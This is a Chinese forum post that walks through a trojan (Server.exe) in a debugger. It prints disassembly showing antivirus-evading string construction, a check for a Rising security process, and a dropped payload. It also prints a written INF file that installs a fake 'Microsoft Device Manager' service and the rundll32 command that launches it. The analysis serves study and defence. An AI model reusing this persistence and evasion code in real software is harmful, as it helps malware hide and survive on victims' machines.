好友
阅读权限25
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 sunflover 于 2013-1-16 13:38 编辑
【文章标题】: 某木马的简单分析
【文章作者】: sunflover
【作者邮箱】: sunflover@163.com
【软件名称】: Server.exe
【软件大小】: 169KB
【下载地址】: 见帖尾
【加壳方式】: 无壳
【编写语言】: Microsoft Visual C++ 6.0
【使用工具】: od修改版
【操作平台】: VM Ware XP sp3断网环境
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
360卫士上说我有18天未杀毒了,于是我就杀了一下C,D两盘,在360沙箱里扫出这个小马。
估计是之前看教程时留下的,就是那种屏幕录象专家录制的exe里,之前听前辈们说过这种很贱的方法,不料今日竟然遇见。
木马图标伪装为系统自带图片查看器所看见的图标,还好我没有隐藏常用扩展名。名字也很白,Server.exe。
这是我第一次分析木马,哪里写的不好,还请大家包涵指正。
1.PEID查壳结果如下:
2.上od,分析。
EP:00402812 载入od,大概一看,主函数入口:00401960,不知道怎么看这个的建议去看幽灵逆向的反汇编教程。
[AppleScript] 纯文本查看 复制代码 00401960 /$ 55 push ebp
00401961 |. 8BEC mov ebp,esp
00401963 |. 81EC 14090000 sub esp,0x914
00401969 |. 53 push ebx
0040196A |. 56 push esi
0040196B |. 57 push edi
0040196C |. FF15 28474000 call dword ptr ds:[0x404728] ; Server.0040262A
00401972 |. 6A 00 push 0x0
00401974 |. 6A 00 push 0x0
00401976 |. 6A 00 push 0x0
00401978 |. FF15 3C304000 call dword ptr ds:[<&KERNEL32.GetCu>; [GetCurrentThreadId
0040197E |. 50 push eax
0040197F |. FF15 2C474000 call dword ptr ds:[0x40472C] ; Server.00402618
00401985 |. 6A 00 push 0x0
00401987 |. 6A 00 push 0x0
00401989 |. 8D45 9C lea eax,[local.25]
0040198C |. 6A 00 push 0x0
0040198E |. 50 push eax
0040198F |. FF15 44474000 call dword ptr ds:[0x404744] ; Server.004025AC
00401995 |. 8B35 0C304000 mov esi,dword ptr ds:[<&KERNEL32.Lo>; kernel32.LoadLibraryA
0040199B |. 8D4D D0 lea ecx,[local.12]
0040199E |. B3 65 mov bl,0x65 ; e的ASCII码为0x65
004019A0 |. 51 push ecx ; /ProcNameOrOrdinal
004019A1 |. 68 CC444000 push Server.004044CC ; |/kernel32.dll
004019A6 |. C645 D0 47 mov byte ptr ss:[ebp-0x30],0x47 ; ||G
004019AA |. 885D D1 mov byte ptr ss:[ebp-0x2F],bl ; ||e
004019AD |. C645 D2 74 mov byte ptr ss:[ebp-0x2E],0x74 ; ||t
004019B1 |. C645 D3 4D mov byte ptr ss:[ebp-0x2D],0x4D ; ||下同,取字符,这种手法在这个小马中运用得很多
004019B5 |. C645 D4 6F mov byte ptr ss:[ebp-0x2C],0x6F ; ||这样做估计是为了免杀吧
004019B9 |. C645 D5 64 mov byte ptr ss:[ebp-0x2B],0x64 ; ||d
004019BD |. C645 D6 75 mov byte ptr ss:[ebp-0x2A],0x75 ; ||u
004019C1 |. C645 D7 6C mov byte ptr ss:[ebp-0x29],0x6C ; ||l
004019C5 |. 885D D8 mov byte ptr ss:[ebp-0x28],bl ; ||e
004019C8 |. C645 D9 46 mov byte ptr ss:[ebp-0x27],0x46 ; ||F
004019CC |. C645 DA 69 mov byte ptr ss:[ebp-0x26],0x69 ; ||i
004019D0 |. C645 DB 6C mov byte ptr ss:[ebp-0x25],0x6C ; ||l
004019D4 |. 885D DC mov byte ptr ss:[ebp-0x24],bl ; ||e
004019D7 |. C645 DD 4E mov byte ptr ss:[ebp-0x23],0x4E ; ||N
004019DB |. C645 DE 61 mov byte ptr ss:[ebp-0x22],0x61 ; ||a
004019DF |. C645 DF 6D mov byte ptr ss:[ebp-0x21],0x6D ; ||m
004019E3 |. 885D E0 mov byte ptr ss:[ebp-0x20],bl ; ||e
004019E6 |. C645 E1 41 mov byte ptr ss:[ebp-0x1F],0x41 ; ||拼起来就是GetModuleFileNameA
004019EA |. C645 E2 00 mov byte ptr ss:[ebp-0x1E],0x0 ; ||字符串结束符
004019EE |. FFD6 call esi ; |\LoadLibraryA
004019F0 |. 8B3D 08304000 mov edi,dword ptr ds:[<&KERNEL32.Ge>; |kernel32.GetProcAddress
004019F6 |. 50 push eax ; |hModule
004019F7 |. FFD7 call edi ; \GetProcAddress
004019F9 |. 8D55 F4 lea edx,[local.3] ; 以上代码的功能就是获取GetModuleFileNameA函数的地址
004019FC |. 8945 B8 mov [local.18],eax
004019FF |. 52 push edx
到主程序入口后一路F8往下跟,跟到这里之后发现一个可疑的字符串, RsTray.exe
[AppleScript] 纯文本查看 复制代码 00401A26 |. C645 FE 00 mov byte ptr ss:[ebp-0x2],0x0 ; 以上代码与前面相似,拼接字符串,RsTray.exe
00401A2A |. E8 11F9FFFF call Server.00401340 ; 可疑得进程名,百度一下就知道了, RsTray.exe是瑞星卡卡上网安全助手的实时监控程序,猜想是要干掉杀软。
00401A2F |. 83C4 04 add esp,0x4
00401A32 |. 85C0 test eax,eax
00401A34 |. 74 61 je short Server.00401A97
00401A36 |. 90 nop
00401A37 |. 90 nop
我们F7进入00401A2A处的call看看它想怎样,
[AppleScript] 纯文本查看 复制代码 00401340 /$ 83EC 20 sub esp,0x20
00401343 |. 53 push ebx
00401344 |. 55 push ebp
00401345 |. 56 push esi
00401346 |. 8B35 0C304000 mov esi,dword ptr ds:[<&KERNEL32.Lo>; kernel32.LoadLibraryA
0040134C |. 8D4424 1C lea eax,dword ptr ss:[esp+0x1C]
00401350 |. 57 push edi
00401351 |. B3 73 mov bl,0x73
00401353 |. 50 push eax ; /ProcNameOrOrdinal
00401354 |. 68 CC444000 push Server.004044CC ; |/kernel32.dll
00401359 |. C64424 28 50 mov byte ptr ss:[esp+0x28],0x50 ; ||
0040135E |. C64424 29 72 mov byte ptr ss:[esp+0x29],0x72 ; ||
00401363 |. C64424 2A 6F mov byte ptr ss:[esp+0x2A],0x6F ; ||
00401368 |. C64424 2B 63 mov byte ptr ss:[esp+0x2B],0x63 ; ||
0040136D |. C64424 2C 65 mov byte ptr ss:[esp+0x2C],0x65 ; ||
00401372 |. 885C24 2D mov byte ptr ss:[esp+0x2D],bl ; ||
00401376 |. 885C24 2E mov byte ptr ss:[esp+0x2E],bl ; ||
0040137A |. C64424 2F 33 mov byte ptr ss:[esp+0x2F],0x33 ; ||
0040137F |. C64424 30 32 mov byte ptr ss:[esp+0x30],0x32 ; ||
00401384 |. C64424 31 46 mov byte ptr ss:[esp+0x31],0x46 ; ||
00401389 |. C64424 32 69 mov byte ptr ss:[esp+0x32],0x69 ; ||
0040138E |. C64424 33 72 mov byte ptr ss:[esp+0x33],0x72 ; ||
00401393 |. 885C24 34 mov byte ptr ss:[esp+0x34],bl ; ||
00401397 |. C64424 35 74 mov byte ptr ss:[esp+0x35],0x74 ; ||
0040139C |. C64424 36 00 mov byte ptr ss:[esp+0x36],0x0 ; ||拼接字符串Process32First,印证之前猜想,要用Process32First获取RsTray.exe进程的句柄
004013A1 |. FFD6 call esi ; |\LoadLibraryA
004013A3 |. 8B3D 08304000 mov edi,dword ptr ds:[<&KERNEL32.Ge>; |kernel32.GetProcAddress
004013A9 |. 50 push eax ; |hModule
004013AA |. FFD7 call edi ; \GetProcAddress
004013AC |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10] ; 获取Process32First函数地址,代码与前面雷同
004013B0 |. 8BE8 mov ebp,eax
004013B2 |. 51 push ecx ; /ProcNameOrOrdinal
004013B3 |. 68 CC444000 push Server.004044CC ; |/kernel32.dll
004013B8 |. C64424 18 50 mov byte ptr ss:[esp+0x18],0x50 ; ||
004013BD |. C64424 19 72 mov byte ptr ss:[esp+0x19],0x72 ; ||
004013C2 |. C64424 1A 6F mov byte ptr ss:[esp+0x1A],0x6F ; ||
004013C7 |. C64424 1B 63 mov byte ptr ss:[esp+0x1B],0x63 ; ||
004013CC |. C64424 1C 65 mov byte ptr ss:[esp+0x1C],0x65 ; ||
004013D1 |. 885C24 1D mov byte ptr ss:[esp+0x1D],bl ; ||
004013D5 |. 885C24 1E mov byte ptr ss:[esp+0x1E],bl ; ||
004013D9 |. C64424 1F 33 mov byte ptr ss:[esp+0x1F],0x33 ; ||
004013DE |. C64424 20 32 mov byte ptr ss:[esp+0x20],0x32 ; ||
004013E3 |. C64424 21 4E mov byte ptr ss:[esp+0x21],0x4E ; ||
004013E8 |. C64424 22 65 mov byte ptr ss:[esp+0x22],0x65 ; ||
004013ED |. C64424 23 78 mov byte ptr ss:[esp+0x23],0x78 ; ||
004013F2 |. C64424 24 74 mov byte ptr ss:[esp+0x24],0x74 ; ||
004013F7 |. C64424 25 00 mov byte ptr ss:[esp+0x25],0x0 ; ||拼接Process32Next,下面获取他的地址
004013FC |. FFD6 call esi ; |\LoadLibraryA
004013FE |. 50 push eax ; |hModule
004013FF |. FFD7 call edi ; \GetProcAddress
00401401 |. 6A 00 push 0x0 ; /ProcessID = 0
00401403 |. 6A 02 push 0x2 ; |Flags = TH32CS_SNAPPROCESS
00401405 |. 8BD8 mov ebx,eax ; |
00401407 |. E8 44110000 call <jmp.&KERNEL32.CreateToolhelp3>; \CreateToolhelp32Snapshot
0040140C |. 68 28010000 push 0x128 ; 上面创建进程快照
00401411 |. 8BF8 mov edi,eax
00401413 |. E8 EE130000 call <jmp.&MSVCRT.operator new>
00401418 |. 83C4 04 add esp,0x4
0040141B |. 8BF0 mov esi,eax
0040141D |. 56 push esi
0040141E |. 57 push edi
0040141F |. C706 28010000 mov dword ptr ds:[esi],0x128
00401425 |. FFD5 call ebp ; (kernel32.Process32First)
00401427 |. 85C0 test eax,eax
00401429 |. 74 40 je short Server.0040146B
0040142B |. 8B5424 34 mov edx,dword ptr ss:[esp+0x34] ; "RsTray.exe"
0040142F |. 8D6E 24 lea ebp,dword ptr ds:[esi+0x24] ; [System Process]
00401432 |. 52 push edx ; /s2
00401433 |. 55 push ebp ; |s1
00401434 |. E8 87170000 call <jmp.&MSVCRT._strcmpi> ; \_strcmpi
00401439 |. 83C4 08 add esp,0x8 ; 以上利用代码创建进程快照后,检查进程中是否含有RsTray.exe进程
0040143C |. 85C0 test eax,eax
0040143E |. 75 0B jnz short Server.0040144B ; 我虚拟机就一个360卫士,所以这里跳转实现
00401440 |> 8B46 08 mov eax,dword ptr ds:[esi+0x8]
00401443 |. 5F pop edi
00401444 |. 5E pop esi
00401445 |. 5D pop ebp
00401446 |. 5B pop ebx
00401447 |. 83C4 20 add esp,0x20
0040144A |. C3 retn
0040144B |> 56 push esi
0040144C |. 57 push edi
0040144D |. FFD3 call ebx ; (kernel32.Process32Next)
0040144F |. 85C0 test eax,eax ; 下面继续检测进程中是否有RsTray.exe
00401451 |. 74 18 je short Server.0040146B
00401453 |> 8B4424 34 /mov eax,dword ptr ss:[esp+0x34]
00401457 |. 50 |push eax ; /String2
00401458 |. 55 |push ebp ; |String1
00401459 |. FF15 18304000 |call dword ptr ds:[<&KERNEL32.lstr>; \lstrcmpiA
0040145F |. 85C0 |test eax,eax
00401461 |.^ 74 DD |je short Server.00401440 ; 我虚拟机就一个360卫士,所以这里永不跳转
00401463 |. 56 |push esi
00401464 |. 57 |push edi
00401465 |. FFD3 |call ebx
00401467 |. 85C0 |test eax,eax
00401469 |.^ 75 E8 \jnz short Server.00401453
0040146B |> 5F pop edi
0040146C |. 5E pop esi
0040146D |. 5D pop ebp
0040146E |. 33C0 xor eax,eax
00401470 |. 5B pop ebx
00401471 |. 83C4 20 add esp,0x20
00401474 \. C3 retn
00401475 90 nop
以上代码可以说是一目了然了,创建进程快照,然后检测 "RsTray.exe"进程是否存在。一路F8走过来,retn后,继续F8,来到以下可疑处
[AppleScript] 纯文本查看 复制代码 00401AE1 |. C645 CD 79 mov byte ptr ss:[ebp-0x33],0x79
00401AE5 |. C645 CE 41 mov byte ptr ss:[ebp-0x32],0x41
00401AE9 |. C645 CF 00 mov byte ptr ss:[ebp-0x31],0x0 ; 拼接GetSystemDirectoryA,用于获取系统特定目录
00401AED |. FFD6 call esi ; LoadLibraryA
00401AEF |. 50 push eax
00401AF0 |. FFD7 call edi ; (kernel32.GetProcAddress)代码都是一样的
00401AF2 |. 8D95 F8FDFFFF lea edx,[local.130] ; (ntdll.KiFastSystemCallRet)
00401AF8 |. 68 04010000 push 0x104
00401AFD |. 52 push edx
00401AFE |. FFD0 call eax ; (kernel32.GetSystemDirectoryA)
00401B00 |. 8B35 00304000 mov esi,dword ptr ds:[<&KERNEL32.ls>; kernel32.lstrcatA
00401B06 |. 8D85 F8FDFFFF lea eax,[local.130] ; "C:\WINDOWS\system32"
00401B0C |. 68 C4454000 push Server.004045C4 ; /\
00401B11 |. 50 push eax ; |ConcatString
00401B12 |. FFD6 call esi ; \lstrcatA
00401B14 |. 8B3D 2C304000 mov edi,dword ptr ds:[<&KERNEL32.ls>; kernel32.lstrcpyA
00401B1A |. 8D8D F8FDFFFF lea ecx,[local.130]
00401B20 |. 8D95 F4FCFFFF lea edx,[local.195]
00401B26 |. 51 push ecx ; /String2
00401B27 |. 52 push edx ; |String1
00401B28 |. FFD7 call edi ; \lstrcpyA
00401B2A |. 6A 1A push 0x1A
00401B2C |. E8 4FF9FFFF call Server.00401480 ; 调用随机数生成函数
00401B31 |. 83C4 04 add esp,0x4
00401B34 |. 83C0 61 add eax,0x61
00401B37 |. 50 push eax
00401B38 |. 6A 1A push 0x1A
00401B3A |. E8 41F9FFFF call Server.00401480
00401B3F |. 83C4 04 add esp,0x4
00401B42 |. 83C0 61 add eax,0x61
00401B45 |. 50 push eax
00401B46 |. 6A 1A push 0x1A
00401B48 |. E8 33F9FFFF call Server.00401480
00401B4D |. 83C4 04 add esp,0x4
这里我们来看看00401B2C |. E8 4FF9FFFF call Server.00401480 ; 调用随机数生成函数这个call的实现吧,高手步过。。菜鸟F7步入看看
[AppleScript] 纯文本查看 复制代码 00401480 /$ 56 push esi
00401481 |. FF15 20304000 call dword ptr ds:[<&KERNEL32.GetTi>; [GetTickCount
00401487 |. 8BF0 mov esi,eax ; 获取开机到现在所逝去的毫秒数
00401489 |. E8 7E130000 call <jmp.&MSVCRT.rand> ; [rand
0040148E |. 83C0 03 add eax,0x3 ; 生成随机数
00401491 |. 33D2 xor edx,edx
00401493 |. 0FAFC6 imul eax,esi
00401496 |. F77424 08 div dword ptr ss:[esp+0x8] ; 处理后的随机数=(随机数+3)*获取开机到现在所逝去的毫秒数/dword ptr [esp+8],病毒惯用伎俩,估计后面要生成随机文件名的文件了
0040149A |. 5E pop esi
0040149B |. 8BC2 mov eax,edx
0040149D \. C3 retn
0040149E 90 nop
这里的算法很简单,不懂汇编指令的朋友可要自己去恶补一下,retn后继续F8至(无关紧要的代码我就不贴了)
[AppleScript] 纯文本查看 复制代码 00401B6F |. 50 push eax
00401B70 |. 6A 1A push 0x1A
00401B72 |. E8 09F9FFFF call Server.00401480
00401B77 |. 8B1D 54474000 mov ebx,dword ptr ds:[0x404754] ; Server.00402556
00401B7D |. 83C4 04 add esp,0x4
00401B80 |. 83C0 61 add eax,0x61
00401B83 |. 50 push eax
00401B84 |. 8D85 FCFEFFFF lea eax,[local.65]
00401B8A |. 68 B0454000 push Server.004045B0 ; %c%c%c%c%c%c.dll
00401B8F |. 50 push eax
00401B90 |. FFD3 call ebx
00401B92 |. 83C4 20 add esp,0x20 ; 果然,此时堆栈窗口看见文件名"mybtke.dll"
00401B95 |. 8D8D FCFEFFFF lea ecx,[local.65]
00401B9B |. 51 push ecx ; ASCII "00000000000000000000000"
00401B9C |. 68 B4414000 push Server.004041B4 ; cwrmas.dll
00401BA1 |. FFD7 call edi ; (kernel32.lstrcpyA)
00401BA3 |. 8D95 F8FDFFFF lea edx,[local.130]
00401BA9 |. 68 B4414000 push Server.004041B4 ; cwrmas.dll
00401BAE |. 52 push edx ; "C:\WINDOWS\system32\"
00401BAF |. FFD6 call esi ; (kernel32.lstrcatA)
00401BB1 |. 8D85 F8FDFFFF lea eax,[local.130] ; 拼接字符串,系统目录+6位随机dll文件名,"C:\WINDOWS\system32\mybtke.dll"
00401BB7 |. 50 push eax ; /FileName
00401BB8 |. FF15 24304000 call dword ptr ds:[<&KERNEL32.Delet>; \DeleteFileA
00401BBE |. 6A 1A push 0x1A
00401BC0 |. E8 BBF8FFFF call Server.00401480 ; 调用随机数生成函数
从00401BB8处看,我认为源代码不够严谨,因为文件名是随机的,所以删除现在的文件名肯定是不成功的。
文件名有了,估计下一步就是创建文件了。
[AppleScript] 纯文本查看 复制代码 00401C03 |. 50 push eax
00401C04 |. 6A 1A push 0x1A
00401C06 |. E8 75F8FFFF call Server.00401480
00401C0B |. 83C4 04 add esp,0x4
00401C0E |. 83C0 61 add eax,0x61
00401C11 |. 8D8D 4CFFFFFF lea ecx,[local.45]
00401C17 |. 50 push eax
00401C18 |. 68 A0454000 push Server.004045A0 ; %c%c%c%c%c%c
00401C1D |. 51 push ecx
00401C1E |. FFD3 call ebx
00401C20 |. 83C4 20 add esp,0x20
00401C23 |. 8D95 4CFFFFFF lea edx,[local.45]
00401C29 |. 8D85 F4FCFFFF lea eax,[local.195]
00401C2F |. 52 push edx
00401C30 |. 50 push eax
00401C31 |. FFD6 call esi
00401C33 |. 8D8D F4FCFFFF lea ecx,[local.195]
00401C39 |. 68 98454000 push Server.00404598 ; .exe
00401C3E |. 51 push ecx
00401C3F |. FFD6 call esi
00401C41 |. 8D95 F4FCFFFF lea edx,[local.195] ; 拼接"C:\WINDOWS\system32\ycgigg.exe"
00401C47 |. 52 push edx ; /FileName
00401C48 |. FF15 24304000 call dword ptr ds:[<&KERNEL32.Delet>; \DeleteFileA
00401C4E |. 8D85 F4FCFFFF lea eax,[local.195]
00401C54 |. 50 push eax
00401C55 |. 68 B4404000 push Server.004040B4 ; 监测和监视新硬件设备并自动更新设备驱动。
00401C5A |. 68 34404000 push Server.00404034 ; Microsoft Device Manager
00401C5F |. 68 14404000 push Server.00404014 ; X6Remote
00401C64 |. E8 57010000 call Server.00401DC0
00401C69 |. 68 14404000 push Server.00404014 ; X6Remote
00401C6E |. 8D8D F4FCFFFF lea ecx,[local.195]
00401C74 |. 68 B4424000 push Server.004042B4 ; AAAAAA/87xz6eIiIuLp+TL/LOPiYmJiZk=
00401C79 |. 51 push ecx
00401C7A |. 68 94454000 push Server.00404594 ; BIN
00401C7F |. 68 90454000 push Server.00404590 ; EXE
00401C84 |. 6A 00 push 0x0
00401C86 |. E8 15F8FFFF call Server.004014A0
00401C8B |. 68 14404000 push Server.00404014 ; X6Remote
[AppleScript] 纯文本查看 复制代码 00401FD7 |> /8B95 44FFFFFF /mov edx,[local.47]
00401FDD |> |8D4D A4 lea ecx,[local.23]
00401FE0 |. |6A 00 |push 0x0
00401FE2 |. |51 |push ecx
00401FE3 |. |52 |push edx ; /String
00401FE4 |. |FF15 30304000 |call dword ptr ds:[<&KERNEL32.lstr>; \lstrlenA
00401FEA |. |8B95 44FFFFFF |mov edx,[local.47]
00401FF0 |. |50 |push eax
00401FF1 |. |52 |push edx
00401FF2 |. |56 |push esi
00401FF3 |. |E8 98F1FFFF |call Server.00401190 ; 写exe文件内容
00401FF8 |. |83C4 14 |add esp,0x14
00401FFB |. |4F |dec edi
00401FFC |.^\75 D9 \jnz short Server.00401FD7
00401FFE |. 56 push esi ; /hObject
00401FFF |. FF15 10304000 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
00402005 |. B9 40000000 mov ecx,0x40 ; 写完后关闭文件句柄
这段代码释放了文件"C:\WINDOWS\system32\ycgigg.exe",至于 AAAAAA/87xz6eIiIuLp+TL/LOPiYmJiZk=这个是什么算法,菜鸟无知,也没有看见解密,看见懂的朋友欢迎点拨,我猜是一个网址,用于下载木马,因为Server.exe只有169KB,这个exe却有20M,很多数据都是用20H填充。
[AppleScript] 纯文本查看 复制代码 0040209D |. 52 push edx
0040209E |. 68 A4464000 push Server.004046A4 ; %s\OWy1815552.inf
004020A3 |. 50 push eax
004020A4 |. FFD6 call esi ; wsprintfA
004020A6 |. 83C4 0C add esp,0xC ; 格式化输出"C:\WINDOWS\system32\OWy1815552.inf",下面也是同样的
004020A9 |. 8D8D DCFAFFFF lea ecx,[local.329]
004020AF |. 8D95 DCFBFFFF lea edx,[local.265]
004020B5 |. 51 push ecx
004020B6 |. 68 90464000 push Server.00404690 ; %s\OWy1815552.bat
004020BB |. 52 push edx
004020BC |. FFD6 call esi
004020BE |. 8B35 24304000 mov esi,dword ptr ds:[<&KERNEL32.De>; kernel32.DeleteFileA
004020C4 |. 83C4 0C add esp,0xC
004020C7 |. 8D85 E4FDFFFF lea eax,[local.135]
004020CD |. 50 push eax ; /FileName
004020CE |. FFD6 call esi ; \DeleteFileA
004020D0 |. 8D8D DCFBFFFF lea ecx,[local.265] ; 先删除inf文件
004020D6 |. 51 push ecx ; /FileName
004020D7 |. FFD6 call esi ; \DeleteFileA
004020D9 |. A1 88464000 mov eax,dword ptr ds:[0x404688] ; 先删除bat文件
注释已经够清晰了,不再累赘
[AppleScript] 纯文本查看 复制代码 00402146 |. AA stos byte ptr es:[edi] ; 再创建inf文件
00402147 |. FF95 48FFFFFF call [local.46]
0040214D |. 8B3D 30304000 mov edi,dword ptr ds:[<&KERNEL32.ls>; kernel32.lstrlenA
00402153 |. 8BF0 mov esi,eax
00402155 |. 8D45 F4 lea eax,[local.3]
00402158 |. 6A 00 push 0x0
0040215A |. 8D8D E0FCFFFF lea ecx,[local.200]
00402160 |. 50 push eax
00402161 |. 51 push ecx ; /String
00402162 |. FFD7 call edi ; \lstrlenA
00402164 |. 40 inc eax
00402165 |. 8D95 E0FCFFFF lea edx,[local.200]
0040216B |. 50 push eax
0040216C |. 52 push edx
0040216D |. 56 push esi
0040216E |. E8 1DF0FFFF call Server.00401190 ; 写inf文件内容
00402173 |. 83C4 14 add esp,0x14
00402176 |. 6A 01 push 0x1
00402178 |. 6A 00 push 0x0
0040217A |. 6A FF push -0x1
0040217C |. 56 push esi
0040217D |. FF95 40FFFFFF call [local.48]
00402183 |. 8D45 F4 lea eax,[local.3]
00402186 |. 6A 00 push 0x0
00402188 |. 8D8D D8F9FFFF lea ecx,[local.394]
0040218E |. 50 push eax
0040218F |. 51 push ecx
00402190 |. FFD7 call edi
00402192 |. 40 inc eax
00402193 |. 8D95 D8F9FFFF lea edx,[local.394]
00402199 |. 50 push eax
0040219A |. 52 push edx
0040219B |. 56 push esi
0040219C |. E8 EFEFFFFF call Server.00401190
004021A1 |. 83C4 14 add esp,0x14
004021A4 |. 56 push esi ; /hObject
004021A5 |. FF15 10304000 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
004021AB |. 8B45 08 mov eax,[arg.1]
004021AE |. 68 54464000 push Server.00404654 ; My_AddService_Name
004021B3 |. 50 push eax
004021B4 |. 8D8D CCF6FFFF lea ecx,[local.589]
004021BA |. 68 4C464000 push Server.0040464C ; %s,,%s
004021BF |. 51 push ecx
004021C0 |. FF15 54474000 call dword ptr ds:[0x404754] ; user32.wsprintfA
004021C6 |. 8B35 40304000 mov esi,dword ptr ds:[<&KERNEL32.Wr>; kernel32.WritePrivateProfileStringA
004021CC |. 83C4 10 add esp,0x10
004021CF |. 8D95 E4FDFFFF lea edx,[local.135]
004021D5 |. 8D85 CCF6FFFF lea eax,[local.589] ; 以下为写inf文件内容
004021DB |. 52 push edx ; /FileName
004021DC |. 50 push eax ; |String
004021DD |. 68 40464000 push Server.00404640 ; |AddService
004021E2 |. 68 28464000 push Server.00404628 ; |DefaultInstall.Services
004021E7 |. FFD6 call esi ; \WritePrivateProfileStringA
004021E9 |. 8B55 0C mov edx,[arg.2]
004021EC |. 8D8D E4FDFFFF lea ecx,[local.135]
004021F2 |. 51 push ecx ; /FileName
004021F3 |. 52 push edx ; |String
004021F4 |. 68 1C464000 push Server.0040461C ; |DisplayName
004021F9 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
004021FE |. FFD6 call esi ; \WritePrivateProfileStringA
00402200 |. 8B4D 10 mov ecx,[arg.3]
00402203 |. 8D85 E4FDFFFF lea eax,[local.135]
00402209 |. 50 push eax ; /FileName
0040220A |. 51 push ecx ; |String
0040220B |. 68 10464000 push Server.00404610 ; |Description
00402210 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
00402215 |. FFD6 call esi ; \WritePrivateProfileStringA
00402217 |. 8D95 E4FDFFFF lea edx,[local.135]
0040221D |. 52 push edx ; /FileName
0040221E |. 68 08464000 push Server.00404608 ; |0x10
00402223 |. 68 FC454000 push Server.004045FC ; |ServiceType
00402228 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
0040222D |. FFD6 call esi ; \WritePrivateProfileStringA
0040222F |. 8D85 E4FDFFFF lea eax,[local.135]
00402235 |. 50 push eax ; /FileName
00402236 |. 68 F8454000 push Server.004045F8 ; |2
0040223B |. 68 EC454000 push Server.004045EC ; |StartType
00402240 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
00402245 |. FFD6 call esi ; \WritePrivateProfileStringA
00402247 |. 8D8D E4FDFFFF lea ecx,[local.135]
0040224D |. 51 push ecx ; /FileName
0040224E |. 68 E8454000 push Server.004045E8 ; |0
00402253 |. 68 D8454000 push Server.004045D8 ; |ErrorControl
00402258 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
0040225D |. FFD6 call esi ; \WritePrivateProfileStringA
0040225F |. 8B45 14 mov eax,[arg.4]
00402262 |. 8D95 E4FDFFFF lea edx,[local.135]
00402268 |. 52 push edx ; /FileName
00402269 |. 8D4D CC lea ecx,[local.13] ; |
0040226C |. 50 push eax ; |String
0040226D |. 51 push ecx ; |Key
0040226E |. 68 54464000 push Server.00404654 ; |My_AddService_Name
00402273 |. C645 CC 53 mov byte ptr ss:[ebp-0x34],0x53 ; |
00402277 |. 885D CD mov byte ptr ss:[ebp-0x33],bl ; |
0040227A |. C645 CE 72 mov byte ptr ss:[ebp-0x32],0x72 ; |
0040227E |. C645 CF 76 mov byte ptr ss:[ebp-0x31],0x76 ; |
00402282 |. C645 D0 69 mov byte ptr ss:[ebp-0x30],0x69 ; |
00402286 |. C645 D1 63 mov byte ptr ss:[ebp-0x2F],0x63 ; |
0040228A |. 885D D2 mov byte ptr ss:[ebp-0x2E],bl ; |
0040228D |. C645 D3 42 mov byte ptr ss:[ebp-0x2D],0x42 ; |
00402291 |. C645 D4 69 mov byte ptr ss:[ebp-0x2C],0x69 ; |
00402295 |. C645 D5 6E mov byte ptr ss:[ebp-0x2B],0x6E ; |
00402299 |. C645 D6 61 mov byte ptr ss:[ebp-0x2A],0x61 ; |
0040229D |. C645 D7 72 mov byte ptr ss:[ebp-0x29],0x72 ; |
004022A1 |. C645 D8 79 mov byte ptr ss:[ebp-0x28],0x79 ; |
004022A5 |. C645 D9 00 mov byte ptr ss:[ebp-0x27],0x0 ; |"My_AddService_Name"
004022A9 |. FFD6 call esi ; \WritePrivateProfileStringA
004022AB |. B1 70 mov cl,0x70 ; 以上这些都还是在写inf文件内容
004022AD |. B0 20 mov al,0x20
写inf文件内容,其中一次分析的inf文件内容如下
[AppleScript] 纯文本查看 复制代码 [Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=X6Remote,,My_AddService_Name
[My_AddService_Name]
DisplayName=Microsoft Device Manager
Description=监测和监视新硬件设备并自动更新设备驱动。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\WINDOWS\system32\qgrzld.exe
[AppleScript] 纯文本查看 复制代码 00402449 |. C645 89 73 mov byte ptr ss:[ebp-0x77],0x73
0040244D |. C645 8A 00 mov byte ptr ss:[ebp-0x76],0x0
00402451 |. FF15 54474000 call dword ptr ds:[0x404754] ; user32.wsprintfA
00402457 |. 83C4 0C add esp,0xC ; 格式化输出bat文件内容
0040245A |. 8D95 DCFBFFFF lea edx,[local.265]
00402460 |. 6A 00 push 0x0
00402462 |. 68 80000000 push 0x80
00402467 |. 6A 02 push 0x2
00402469 |. 6A 00 push 0x0
0040246B |. 6A 02 push 0x2
0040246D |. 68 00000040 push 0x40000000
00402472 |. 52 push edx
00402473 |. FF95 48FFFFFF call [local.46] ; (kernel32.CreateFileA)创建bat文件
00402479 |. 8BF0 mov esi,eax
0040247B |. 8D45 A0 lea eax,[local.24]
0040247E |. 6A 00 push 0x0
00402480 |. 8D8D D4F8FFFF lea ecx,[local.459]
00402486 |. 50 push eax
00402487 |. 51 push ecx
00402488 |. FFD7 call edi ; (kernel32.lstrlenA)
0040248A |. 40 inc eax
0040248B |. 8D95 D4F8FFFF lea edx,[local.459]
00402491 |. 50 push eax
00402492 |. 52 push edx
00402493 |. 56 push esi
00402494 |. E8 F7ECFFFF call Server.00401190 ; 写bat文件内容
00402499 |. 83C4 14 add esp,0x14
0040249C |. 56 push esi ; /hObject
0040249D |. FF15 10304000 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
写出的bat内容我也贴一份出来,这里的bat,与上面的inf文件名都是死的。
[AppleScript] 纯文本查看 复制代码 rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\WINDOWS\system32\OWy1815552.inf
很显然,下一步就是执行bat,通过bat安装inf,通过inf启动exe。
